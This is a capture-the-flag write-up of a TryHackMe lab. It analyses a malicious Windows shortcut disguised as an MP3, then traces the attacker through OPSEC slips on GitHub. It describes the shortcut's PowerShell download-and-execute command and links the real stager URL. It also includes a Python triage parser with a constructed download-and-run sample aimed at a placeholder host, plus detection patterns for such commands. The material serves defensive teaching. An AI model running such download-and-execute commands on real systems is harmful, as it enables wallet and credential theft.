TryHackMe Advent of Cyber 2024 | OPSEC Day 1 | Task 7
OPSEC | OPERATIONAL SECURITY
About Task:-
Learn how to investigate malicious link files.
Learn about OPSEC and OPSEC mistakes.
Understand how to track and attribute digital identities in cyber investigations.
IP – 10.10.225.49. The machine is up and alive, responding to pings.

NMAP SCAN
Discovered open port 80/tcp on 10.10.225.49
Discovered open port 22/tcp on 10.10.225.49
Discovered open port 8000/tcp on 10.10.225.49
Port 80 shifts our focus to the website and its endpoints.
INVESTIGATING THE WEBSITE

At first glance, this is a YouTube (YT) to MP3/MP4 converter website.

Pasting https://www.youtube.com/watch?v=dQw4w9WgXcQ into the field and choosing the MP3 format gives us a .zip file. Extracting it yields two supposed .mp3 files named “song.mp3” and “somg.mp3”.
Running “file song.mp3” and “file somg.mp3” in the terminal gives the following output:

The first file, “song.mp3”, is a normal MP3, but the second, “somg.mp3”, is not an MP3 at all: file identifies it as an “MS Windows shortcut”, also known as a .lnk file. This file type is used in Windows to link to another file, folder, or application, and shortcuts can also be used to run commands. If you’ve ever seen the shortcuts on a Windows desktop, you already know what they are.
There are multiple ways to inspect .lnk files to reveal the embedded commands and attributes. For this room, however, we’ll use ExifTool, which is already installed on this machine.
To do this, go back to your terminal and type:
exiftool somg.mp3
The output of the above command is:

We can clearly see that it executes a remote PowerShell script hosted on GitHub. Let’s break down each part of this command and understand what it does.
The -ep Bypass -nop flags disable PowerShell’s usual restrictions: -ep Bypass sets the execution policy for this process to Bypass, so script-signing checks do not apply, and -nop (NoProfile) skips loading the user’s profile scripts, so the command runs without interference from security settings or profiles.
The DownloadFile method pulls a file (in this case, IS.ps1) from a remote server (https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1) and saves it as s.ps1 in the C:\ProgramData\ directory on the target machine.
Once downloaded, the script is executed with PowerShell using the iex (Invoke-Expression) command, which runs the downloaded s.ps1 file.
If you visit the contents of the file to be downloaded in your browser (
https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1
), you will see just how lucky we are that we are not currently using Windows.
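Before turning to that script, here is a scripted version of the shortcut inspection, as an added example that is not part of the room or of this writeup. The parser reads the .lnk header and StringData directly, which is where the fields ExifTool reports as Relative Path, Working Directory and Command Line Arguments live, and then runs a small triage check over the command line for the download-and-execute indicators discussed above (-ep Bypass, -nop, DownloadFile, iex). The sample shortcut is built inside the script with a placeholder URL (example.invalid) rather than the real repository; the build_lnk helper, the indicator labels and the file name lnk_triage.py are this example’s own.

```python
"""Parse a Windows Shell Link (.lnk) and triage its command line.

Added example, not code from the TryHackMe room. Layout per MS-SHLLINK:
a 76-byte header, optional LinkTargetIDList and LinkInfo blocks, then the
StringData fields (ExifTool's "Command Line Arguments" is one of them).
"""
import re
import struct
import sys

LNK_HEADER_SIZE = 0x4C
# CLSID {00021401-0000-0000-C000-000000000046} in its on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits this parser needs
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
# StringData fields come in this fixed order, each present only if its flag is set
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk blob; ValueError if it is not one."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short to be a Shell Link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("HeaderSize/CLSID mismatch: not a Shell Link")
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:       # IDListSize (2 bytes) + IDList
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                 # LinkInfoSize counts the whole block
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    unicode = bool(flags & IS_UNICODE)
    fields = {"flags": flags}
    for key, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, pos)   # CountCharacters, no NUL
        pos += 2
        nbytes = count * 2 if unicode else count
        fields[key] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return fields


# Indicators a shortcut stager usually needs; the labels are this example's own
SUSPICIOUS = [
    (r"-e(p|xecutionpolicy)\s+bypass", "execution policy bypass"),
    (r"-nop\b|-noprofile\b", "profile suppressed"),
    (r"\biex\b|invoke-expression", "Invoke-Expression"),
    (r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", "remote download"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
]
URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)


def triage(arguments: str) -> dict:
    """Flag download-and-execute indicators and extract URLs from a command line."""
    hits = [label for pattern, label in SUSPICIOUS
            if re.search(pattern, arguments, re.IGNORECASE)]
    return {"indicators": hits, "urls": URL_RE.findall(arguments)}


def build_lnk(arguments: str, relative_path: str, working_dir: str) -> bytes:
    """Assemble a minimal Unicode .lnk (used only to construct the sample below)."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR
             | HAS_ARGUMENTS | IS_UNICODE)
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20,        # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,     # Creation/Access/Write FILETIMEs (0 = unknown)
                         0, 0, 1,     # FileSize, IconIndex, ShowCommand=SW_SHOWNORMAL
                         0, 0, 0, 0)  # HotKey, Reserved1, Reserved2, Reserved3
    id_list = b"\x04\x00\xab\xcd" + b"\x00\x00"     # one dummy ItemID, then TerminalID
    body = struct.pack("<H", len(id_list)) + id_list
    for s in (relative_path, working_dir, arguments):   # StringData, spec order
        body += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + body + b"\x00\x00\x00\x00"      # TerminalBlock ends ExtraData


# Constructed sample in the shape of the room's shortcut; the URL is a placeholder
SAMPLE_ARGS = (
    "-ep Bypass -nop -c \"(New-Object System.Net.WebClient).DownloadFile("
    "'https://example.invalid/IS.ps1', 'C:\\ProgramData\\s.ps1'); "
    "iex (Get-Content 'C:\\ProgramData\\s.ps1' -Raw)\""
)
SAMPLE_LNK = build_lnk(SAMPLE_ARGS, working_dir="C:\\Windows\\System32",
    relative_path="..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")

if __name__ == "__main__":
    # Usage: python lnk_triage.py somg.mp3 (no argument: use the constructed sample)
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_LNK
    info = parse_lnk(blob)
    for key in ("relative_path", "working_dir", "arguments"):
        print(f"{key:14}: {info.get(key)}")
    print("triage        :", triage(info.get("arguments", "")))
```

Run it as python lnk_triage.py somg.mp3 to read a real shortcut, or with no argument to use the constructed sample. The HeaderSize and CLSID checks reject a genuine MP3 with a ValueError, which is the same distinction file drew between song.mp3 and somg.mp3 above; the triage output lists which of the four indicators the command line hits and the URL it pulls from, so the same check can be run over a whole batch of suspicious downloads.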
As we can see, this script steals the victim’s wallet information for various cryptocurrencies such as Ethereum, Monero, Dogecoin and Bitcoin.
The script is designed to collect highly sensitive information from the victim’s system, such as cryptocurrency wallets and saved browser credentials, and send it to an attacker’s remote server.
This looks fairly typical of a PowerShell script for such a purpose, with one notable exception: a signature in the code that reads
“Created by the one and only M.M.”
Search for this on github.com, or go directly to this link:
https://github.com/search?q=%22Created+by+the+one+and+only+M.M.%22&type=issues
If you look through the search results, you can infer the malicious actor’s identity from information on the project’s page and the GitHub Issues section.

This user commented in the Issues section of the repository, which lets us infer the malicious actor’s identity by visiting their profile page at:
https://github.com/MM-WarevilleTHM/M.M
Their README.md file plainly states the malicious actor’s real name: “Mayor Malware”.
CONCLUSION:-
What do we learn from this? This is a classic case of OPSEC failure. Operational security (OPSEC) is a term originally coined in the military to refer to the process of protecting sensitive information and operations from adversaries. The goal is to identify and eliminate potential vulnerabilities before an adversary can exploit them.
In the context of cyber security, when malicious actors fail to follow proper OPSEC practices, they might leave digital traces that can be pieced together to reveal their identity. Some common OPSEC mistakes include:
Reusing usernames, email addresses, or account handles across multiple platforms. One might assume that anyone trying to cover their tracks would remove such obvious and incriminating information, but sometimes, it’s due to vanity or simply forgetfulness.
Using identifiable metadata in code, documents, or images, which may reveal personal information like device names, GPS coordinates, or timestamps.
Posting publicly on forums or GitHub (Like in this current scenario) with details that tie back to their real identity or reveal their location or habits.
Failing to use a VPN or proxy while conducting malicious activities allows law enforcement to track their real IP address.
You’d think that someone doing something bad would make OPSEC their top priority, but they’re only human and can make mistakes, too.
FOR EXAMPLE
Here are some real-world OPSEC mistakes that led to some really big fails:
1. AlphaBay Admin Takedown
One of the most spectacular OPSEC failures involved Alexandre Cazes, the administrator of AlphaBay, one of the largest dark web marketplaces:
Cazes used the email address “pimp_alex_91@hotmail.com” in early welcome emails from the site.
This email included his year of birth and other identifying information.
He cashed out using a Bitcoin account tied to his real name.
Cazes reused the username “Alpha02” across multiple platforms, linking his dark web identity to forum posts under his real name.
2. Chinese Military Hacking Group (APT1)
There’s also the notorious Chinese hacking group APT1, which made several OPSEC blunders:
One member, Wang Dong, signed his malware code with the nickname “Ugly Gorilla”.
This nickname was linked to programming forum posts associated with his real name.
The group used predictable naming conventions for users, code, and passwords.
Their activity consistently aligned with Beijing business hours, making their location obvious.
These failures provided enough information for cyber security researchers and law enforcement to publicly identify group members.
Uncovering MM (Mayor Malware)
If you’ve thoroughly investigated the GitHub search result, you should have uncovered several clues based on poor OPSEC practices by the malicious actor.
We know the attacker left a distinctive signature in the PowerShell code (MM). This allowed us to search for related repositories and issues pages on GitHub. We then discovered an Issues page where the attacker engaged in discussions, providing more context and linking their activity to other projects.
In this discussion, they responded to a query about modifying the code. This response, paired with their unique handle, was another critical slip-up, leaving behind a trail of evidence that can be traced back to them. By analysing the timestamps, usernames, and the nature of their interactions, we can now attribute the mastermind behind the attack to MM.